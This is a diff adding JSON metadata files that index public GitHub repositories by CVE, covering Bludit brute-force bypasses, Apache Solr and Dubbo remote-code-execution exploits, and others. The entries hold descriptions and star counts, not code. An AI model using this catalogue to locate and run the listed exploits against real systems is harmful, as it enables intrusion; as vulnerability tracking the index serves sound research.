at end of file diff --git a/2019/CVE-2019-17234.json b/2019/CVE-2019-17234.json new file mode 100644 index 0000000000..14935fd1c1 --- /dev/null +++ b/2019/CVE-2019-17234.json @@ -0,0 +1,33 @@ +[ + { + "id": 221713137, + "name": "CVE-2019-17234b-Exploit", + "full_name": "administra1tor\/CVE-2019-17234b-Exploit", + "owner": { + "login": "administra1tor", + "id": 57760715, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57760715?v=4", + "html_url": "https:\/\/github.com\/administra1tor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/administra1tor\/CVE-2019-17234b-Exploit", + "description": "Wordpress IgniteUp plugin < 3.4.1 allows unauthenticated users to arbitrarily delete files on the webserver possibly causing DoS.", + "fork": false, + "created_at": "2019-11-14T14:12:36Z", + "updated_at": "2020-12-21T16:31:31Z", + "pushed_at": "2020-12-21T16:31:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17240.json b/2019/CVE-2019-17240.json new file mode 100644 index 0000000000..7fdbf43c26 --- /dev/null +++ b/2019/CVE-2019-17240.json @@ -0,0 +1,261 @@ +[ + { + "id": 270712468, + "name": "CVE-2019-17240", + "full_name": "pingport80\/CVE-2019-17240", + "owner": { + "login": "pingport80", + "id": 43883877, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43883877?v=4", + "html_url": "https:\/\/github.com\/pingport80", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pingport80\/CVE-2019-17240", + "description": "This is the exploit of CVE-2019-17240. ", + "fork": false, + "created_at": "2020-06-08T15:05:24Z", + "updated_at": "2022-04-04T08:18:32Z", + "pushed_at": "2020-09-25T11:03:25Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 274778835, + "name": "Bludit-3-9-2-bb", + "full_name": "LucaReggiannini\/Bludit-3-9-2-bb", + "owner": { + "login": "LucaReggiannini", + "id": 46603573, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46603573?v=4", + "html_url": "https:\/\/github.com\/LucaReggiannini", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LucaReggiannini\/Bludit-3-9-2-bb", + "description": "Bludit 3.9.2 - bruteforce bypass - CVE-2019-17240", + "fork": false, + "created_at": "2020-06-24T22:08:55Z", + "updated_at": "2022-09-07T13:28:01Z", + "pushed_at": "2020-06-24T23:00:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 283207767, + "name": "Bludit-CVE-2019-17240-Fork", + "full_name": "triple-octopus\/Bludit-CVE-2019-17240-Fork", + "owner": { + "login": "triple-octopus", + "id": 43498671, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43498671?v=4", + "html_url": "https:\/\/github.com\/triple-octopus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/triple-octopus\/Bludit-CVE-2019-17240-Fork", + "description": "Better version of rastating.github.io\/bludit-brute-force-mitigation-bypass\/", + "fork": false, + "created_at": "2020-07-28T12:36:34Z", + "updated_at": "2020-07-29T16:30:34Z", + "pushed_at": "2020-07-29T16:30:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 305984745, + "name": "CVE-2019-17240_Bludit-BF-Bypass", + "full_name": "ColdFusionX\/CVE-2019-17240_Bludit-BF-Bypass", + "owner": { + "login": "ColdFusionX", + "id": 8522240, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8522240?v=4", + "html_url": "https:\/\/github.com\/ColdFusionX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ColdFusionX\/CVE-2019-17240_Bludit-BF-Bypass", + "description": "Bludit <= 3.9.2 - Authentication Bruteforce Mitigation Bypass Exploit\/PoC", + "fork": false, + "created_at": "2020-10-21T10:13:51Z", + "updated_at": "2024-10-24T22:22:26Z", + "pushed_at": "2020-10-24T10:45:48Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bludit", + "brute-force", + "bypass", + "cms", + "cve-2019-17240", + "exploit", + "poc", + "proof-of-concept", + "pwn", + "python3" + ], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 350172979, + "name": "bludit-CVE-2019-17240", + "full_name": "jayngng\/bludit-CVE-2019-17240", + "owner": { + "login": "jayngng", + "id": 72692401, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72692401?v=4", + "html_url": "https:\/\/github.com\/jayngng", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jayngng\/bludit-CVE-2019-17240", + "description": "Bypass bludit mitigation login form and upload malicious to call a rev shell ", + "fork": false, + "created_at": "2021-03-22T01:50:43Z", + "updated_at": "2023-09-24T22:53:11Z", + "pushed_at": "2021-03-22T01:55:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 374746568, + "name": "bloodit", + "full_name": "brunosergi\/bloodit", + "owner": { + "login": "brunosergi", + "id": 65323475, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65323475?v=4", + "html_url": "https:\/\/github.com\/brunosergi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brunosergi\/bloodit", + "description": "Bludit 3.9.2 - Auth Brute Force Mitigation Bypass. CVE-2019-17240", + "fork": false, + "created_at": "2021-06-07T17:22:40Z", + "updated_at": "2021-07-18T23:57:59Z", + "pushed_at": "2021-07-18T23:57:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 377050838, + "name": "cve-2019-17240", + "full_name": "spyx\/cve-2019-17240", + "owner": { + "login": "spyx", + "id": 17102553, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17102553?v=4", + "html_url": "https:\/\/github.com\/spyx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/spyx\/cve-2019-17240", + "description": null, + "fork": false, + "created_at": "2021-06-15T05:51:05Z", + "updated_at": "2021-06-15T21:42:53Z", + "pushed_at": "2021-06-15T05:51:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 778979017, + "name": "CVE-2019-17240", + "full_name": "mind2hex\/CVE-2019-17240", + "owner": { + "login": "mind2hex", + "id": 51345640, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51345640?v=4", + "html_url": "https:\/\/github.com\/mind2hex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mind2hex\/CVE-2019-17240", + "description": "Bludit 3.9.2 auth bruteforce bypass", + "fork": false, + "created_at": "2024-03-28T19:42:54Z", + "updated_at": "2024-03-28T19:43:22Z", + "pushed_at": "2024-03-28T19:43:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17382.json b/2019/CVE-2019-17382.json new file mode 100644 index 0000000000..e82ec83cb3 --- /dev/null +++ b/2019/CVE-2019-17382.json @@ -0,0 +1,40 @@ +[ + { + "id": 735055468, + "name": "CVE-2019-17382-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2019-17382-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2019-17382-EXPLOIT", + "description": "A PoC exploit for CVE-2019-17382 - Zabbix Authentication Bypass", + "fork": false, + "created_at": "2023-12-23T14:02:13Z", + "updated_at": "2024-08-03T02:03:19Z", + "pushed_at": "2023-12-25T21:29:28Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "authentication", + "bypass", + "cve-2019-17382", + "exploits", + "hacking", + "zabbix" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17424.json b/2019/CVE-2019-17424.json new file mode 100644 index 0000000000..2bdee2606f --- /dev/null +++ b/2019/CVE-2019-17424.json @@ -0,0 +1,39 @@ +[ + { + "id": 216429041, + "name": "CVE-2019-17424", + "full_name": "mavlevin\/CVE-2019-17424", + "owner": { + "login": "mavlevin", + "id": 33753158, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33753158?v=4", + "html_url": "https:\/\/github.com\/mavlevin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mavlevin\/CVE-2019-17424", + "description": "RCE Exploit For CVE-2019-17424 (nipper-ng 0.11.10)", + "fork": false, + "created_at": "2019-10-20T21:20:28Z", + "updated_at": "2024-06-06T01:51:52Z", + "pushed_at": "2019-11-16T09:47:12Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploit", + "rce", + "stackoverflow", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17427.json b/2019/CVE-2019-17427.json new file mode 100644 index 0000000000..db60688686 --- /dev/null +++ b/2019/CVE-2019-17427.json @@ -0,0 +1,33 @@ +[ + { + "id": 231651324, + "name": "CVE-2019-17427", + "full_name": "RealLinkers\/CVE-2019-17427", + "owner": { + "login": "RealLinkers", + "id": 22389074, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22389074?v=4", + "html_url": "https:\/\/github.com\/RealLinkers", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RealLinkers\/CVE-2019-17427", + "description": "CVE-2019-17427 Persistent XSS POC", + "fork": false, + "created_at": "2020-01-03T19:25:54Z", + "updated_at": "2024-11-06T11:55:04Z", + "pushed_at": "2020-01-03T19:32:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17495.json b/2019/CVE-2019-17495.json new file mode 100644 index 0000000000..3098d72cfb --- /dev/null +++ b/2019/CVE-2019-17495.json @@ -0,0 +1,33 @@ +[ + { + "id": 229946045, + "name": "CVE-2019-17495-test", + "full_name": "SecT0uch\/CVE-2019-17495-test", + "owner": { + "login": "SecT0uch", + "id": 26085417, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26085417?v=4", + "html_url": "https:\/\/github.com\/SecT0uch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SecT0uch\/CVE-2019-17495-test", + "description": null, + "fork": false, + "created_at": "2019-12-24T13:23:06Z", + "updated_at": "2019-12-24T13:33:21Z", + "pushed_at": "2019-12-24T13:33:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17497.json b/2019/CVE-2019-17497.json new file mode 100644 index 0000000000..b0b9019c10 --- /dev/null +++ b/2019/CVE-2019-17497.json @@ -0,0 +1,33 @@ +[ + { + "id": 453989748, + "name": "cve-2019-17497", + "full_name": "JM-Lemmi\/cve-2019-17497", + "owner": { + "login": "JM-Lemmi", + "id": 41118534, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41118534?v=4", + "html_url": "https:\/\/github.com\/JM-Lemmi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JM-Lemmi\/cve-2019-17497", + "description": "POC Files for CVE-2019-17497", + "fork": false, + "created_at": "2022-01-31T12:03:13Z", + "updated_at": "2022-01-31T12:03:13Z", + "pushed_at": "2022-01-31T12:19:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17498.json b/2019/CVE-2019-17498.json new file mode 100644 index 0000000000..3f078222af --- /dev/null +++ b/2019/CVE-2019-17498.json @@ -0,0 +1,33 @@ +[ + { + "id": 548270214, + "name": "3007Project", + "full_name": "Timon-L\/3007Project", + "owner": { + "login": "Timon-L", + "id": 67786157, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67786157?v=4", + "html_url": "https:\/\/github.com\/Timon-L", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Timon-L\/3007Project", + "description": "Secure coding project, research on CVE-2019-17498 and implement a player score function written in C.", + "fork": false, + "created_at": "2022-10-09T08:17:39Z", + "updated_at": "2022-12-26T04:15:01Z", + "pushed_at": "2022-12-26T03:09:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17513.json b/2019/CVE-2019-17513.json new file mode 100644 index 0000000000..8f5c7a5a3e --- /dev/null +++ b/2019/CVE-2019-17513.json @@ -0,0 +1,33 @@ +[ + { + "id": 808788930, + "name": "Ratpack-1", + "full_name": "epicosy\/Ratpack-1", + "owner": { + "login": "epicosy", + "id": 30272775, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30272775?v=4", + "html_url": "https:\/\/github.com\/epicosy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/epicosy\/Ratpack-1", + "description": "ratpack with CVE-2019-17513", + "fork": false, + "created_at": "2024-05-31T20:26:56Z", + "updated_at": "2024-05-31T20:28:20Z", + "pushed_at": "2024-05-31T20:28:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17525.json b/2019/CVE-2019-17525.json new file mode 100644 index 0000000000..fdb0209a8f --- /dev/null +++ b/2019/CVE-2019-17525.json @@ -0,0 +1,33 @@ +[ + { + "id": 256682033, + "name": "CVE-2019-17525", + "full_name": "huzaifahussain98\/CVE-2019-17525", + "owner": { + "login": "huzaifahussain98", + "id": 45964927, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45964927?v=4", + "html_url": "https:\/\/github.com\/huzaifahussain98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huzaifahussain98\/CVE-2019-17525", + "description": "D-LINK ROUTER \"MODEL NO: DIR-615\" with \"FIRMWARE VERSION:20.10\" & \"HARDWARE VERSION:T1", + "fork": false, + "created_at": "2020-04-18T06:06:44Z", + "updated_at": "2022-10-08T16:29:11Z", + "pushed_at": "2020-04-19T06:17:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17558.json b/2019/CVE-2019-17558.json new file mode 100644 index 0000000000..571eaf2e3f --- /dev/null +++ b/2019/CVE-2019-17558.json @@ -0,0 +1,146 @@ +[ + { + "id": 250560715, + "name": "CVE-2019-17558_Solr_Vul_Tool", + "full_name": "thelostworldFree\/CVE-2019-17558_Solr_Vul_Tool", + "owner": { + "login": "thelostworldFree", + "id": 24971604, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24971604?v=4", + "html_url": "https:\/\/github.com\/thelostworldFree", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thelostworldFree\/CVE-2019-17558_Solr_Vul_Tool", + "description": "CVE-2019-17558 Solr模板注入漏洞图形化一键检测工具。CVE-2019-17558 Solr Velocity Template Vul POC Tool.", + "fork": false, + "created_at": "2020-03-27T14:48:22Z", + "updated_at": "2023-12-03T02:49:57Z", + "pushed_at": "2020-01-10T10:58:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 252131233, + "name": "exphub", + "full_name": "zhzyker\/exphub", + "owner": { + "login": "zhzyker", + "id": 32918050, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32918050?v=4", + "html_url": "https:\/\/github.com\/zhzyker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zhzyker\/exphub", + "description": "Exphub[漏洞利用脚本库] 包括Webloigc、Struts2、Tomcat、Nexus、Solr、Jboss、Drupal的漏洞利用脚本,最新添加CVE-2020-14882、CVE-2020-11444、CVE-2020-10204、CVE-2020-10199、CVE-2020-1938、CVE-2020-2551、CVE-2020-2555、CVE-2020-2883、CVE-2019-17558、CVE-2019-6340", + "fork": false, + "created_at": "2020-04-01T09:33:35Z", + "updated_at": "2024-11-28T15:03:33Z", + "pushed_at": "2021-04-04T09:13:57Z", + "stargazers_count": 4136, + "watchers_count": 4136, + "has_discussions": false, + "forks_count": 1101, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-10199", + "cve-2020-10204", + "cve-2020-11444", + "cve-2020-14882", + "cve-2020-1938", + "cve-2020-2551", + "cve-2020-2555", + "cve-2020-2883", + "cve-2020-5902", + "drupal", + "exp", + "exploit", + "getshell", + "nexus", + "poc", + "tomcat", + "vulnerability", + "weblogic", + "webshell" + ], + "visibility": "public", + "forks": 1101, + "watchers": 4136, + "score": 0, + "subscribers_count": 149 + }, + { + "id": 284893505, + "name": "Solr_CVE-2019-17558", + "full_name": "Ma1Dong\/Solr_CVE-2019-17558", + "owner": { + "login": "Ma1Dong", + "id": 52943794, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52943794?v=4", + "html_url": "https:\/\/github.com\/Ma1Dong", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ma1Dong\/Solr_CVE-2019-17558", + "description": "Solr_CVE-2019-17558", + "fork": false, + "created_at": "2020-08-04T06:13:33Z", + "updated_at": "2021-09-15T09:34:12Z", + "pushed_at": "2020-08-04T06:29:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 321554194, + "name": "Exploit_CVE-2019-17558-RCE", + "full_name": "xkyrage\/Exploit_CVE-2019-17558-RCE", + "owner": { + "login": "xkyrage", + "id": 57317804, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57317804?v=4", + "html_url": "https:\/\/github.com\/xkyrage", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xkyrage\/Exploit_CVE-2019-17558-RCE", + "description": "Apache Solr 1.4 Injection to get a shell", + "fork": false, + "created_at": "2020-12-15T04:38:06Z", + "updated_at": "2020-12-15T04:40:53Z", + "pushed_at": "2020-12-15T04:40:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17564.json b/2019/CVE-2019-17564.json new file mode 100644 index 0000000000..cf799fcdfa --- /dev/null +++ b/2019/CVE-2019-17564.json @@ -0,0 +1,193 @@ +[ + { + "id": 239930294, + "name": "CVE-2019-17564", + "full_name": "r00t4dm\/CVE-2019-17564", + "owner": { + "login": "r00t4dm", + "id": 36941976, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36941976?v=4", + "html_url": "https:\/\/github.com\/r00t4dm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r00t4dm\/CVE-2019-17564", + "description": null, + "fork": false, + "created_at": "2020-02-12T04:55:51Z", + "updated_at": "2020-02-12T07:41:08Z", + "pushed_at": "2020-02-12T07:41:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 240153600, + "name": "CVE-2019-17564", + "full_name": "Jaky5155\/CVE-2019-17564", + "owner": { + "login": "Jaky5155", + "id": 47801640, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47801640?v=4", + "html_url": "https:\/\/github.com\/Jaky5155", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jaky5155\/CVE-2019-17564", + "description": "CVE-2019-17564 Apache Dubbo deserialization RCE", + "fork": false, + "created_at": "2020-02-13T01:40:50Z", + "updated_at": "2024-08-12T19:57:42Z", + "pushed_at": "2020-02-13T01:42:21Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 240413864, + "name": "CVE-2019-17564", + "full_name": "Hu3sky\/CVE-2019-17564", + "owner": { + "login": "Hu3sky", + "id": 37403964, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37403964?v=4", + "html_url": "https:\/\/github.com\/Hu3sky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hu3sky\/CVE-2019-17564", + "description": "CVE-2019-17564 : Apache Dubbo Deserialization Remote Code Execution", + "fork": false, + "created_at": "2020-02-14T02:41:31Z", + "updated_at": "2020-02-14T03:38:04Z", + "pushed_at": "2020-02-14T02:45:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 241072507, + "name": "CVE-2019-17564", + "full_name": "Exploit-3389\/CVE-2019-17564", + "owner": { + "login": "Exploit-3389", + "id": 61142764, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61142764?v=4", + "html_url": "https:\/\/github.com\/Exploit-3389", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Exploit-3389\/CVE-2019-17564", + "description": null, + "fork": false, + "created_at": "2020-02-17T09:52:47Z", + "updated_at": "2020-02-17T10:02:49Z", + "pushed_at": "2020-02-17T10:02:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 241831156, + "name": "CVE-2019-17564-FastJson-Gadget", + "full_name": "Dor-Tumarkin\/CVE-2019-17564-FastJson-Gadget", + "owner": { + "login": "Dor-Tumarkin", + "id": 23374015, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23374015?v=4", + "html_url": "https:\/\/github.com\/Dor-Tumarkin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Dor-Tumarkin\/CVE-2019-17564-FastJson-Gadget", + "description": "Basic code for creating the Alibaba FastJson + Spring gadget chain, as used to exploit Apache Dubbo in CVE-2019-17564 - more information available at https:\/\/www.checkmarx.com\/blog\/apache-dubbo-unauthenticated-remote-code-execution-vulnerability", + "fork": false, + "created_at": "2020-02-20T08:28:55Z", + "updated_at": "2023-06-29T16:52:59Z", + "pushed_at": "2022-12-10T05:45:32Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-17564", + "deserialization", + "dubbo", + "exploitation" + ], + "visibility": "public", + "forks": 2, + "watchers": 15, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 242675940, + "name": "CVE-2019-17564", + "full_name": "fairyming\/CVE-2019-17564", + "owner": { + "login": "fairyming", + "id": 44915879, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44915879?v=4", + "html_url": "https:\/\/github.com\/fairyming", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fairyming\/CVE-2019-17564", + "description": "CVE-2019-17564:Apache Dubbo反序列化漏洞", + "fork": false, + "created_at": "2020-02-24T07:46:36Z", + "updated_at": "2024-08-12T19:58:03Z", + "pushed_at": "2020-02-24T07:54:05Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17570.json b/2019/CVE-2019-17570.json new file mode 100644 index 0000000000..32ba120a6b --- /dev/null +++ b/2019/CVE-2019-17570.json @@ -0,0 +1,69 @@ +[ + { + "id": 234831125, + "name": "CVE-2019-17570", + "full_name": "r00t4dm\/CVE-2019-17570", + "owner": { + "login": "r00t4dm", + "id": 36941976, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36941976?v=4", + "html_url": "https:\/\/github.com\/r00t4dm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r00t4dm\/CVE-2019-17570", + "description": "xmlrpc common deserialization vulnerability", + "fork": false, + "created_at": "2020-01-19T02:57:26Z", + "updated_at": "2021-09-09T02:28:17Z", + "pushed_at": "2020-06-15T22:01:03Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "java", + "poc", + "rce", + "xmlrpc" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 236260202, + "name": "xmlrpc-common-deserialization", + "full_name": "slowmistio\/xmlrpc-common-deserialization", + "owner": { + "login": "slowmistio", + "id": 25600994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25600994?v=4", + "html_url": "https:\/\/github.com\/slowmistio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/slowmistio\/xmlrpc-common-deserialization", + "description": "CVE-2019-17570 details and proof of concept", + "fork": false, + "created_at": "2020-01-26T03:03:20Z", + "updated_at": "2023-07-02T19:21:15Z", + "pushed_at": "2020-01-24T11:52:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-17571.json b/2019/CVE-2019-17571.json new file mode 100644 index 0000000000..1e7b1feb30 --- /dev/null +++ b/2019/CVE-2019-17571.json @@ -0,0 +1,116 @@ +[ + { + "id": 230129409, + "name": "CVE-2019-17571", + "full_name": "shadow-horse\/CVE-2019-17571", + "owner": { + "login": "shadow-horse", + "id": 5432330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5432330?v=4", + 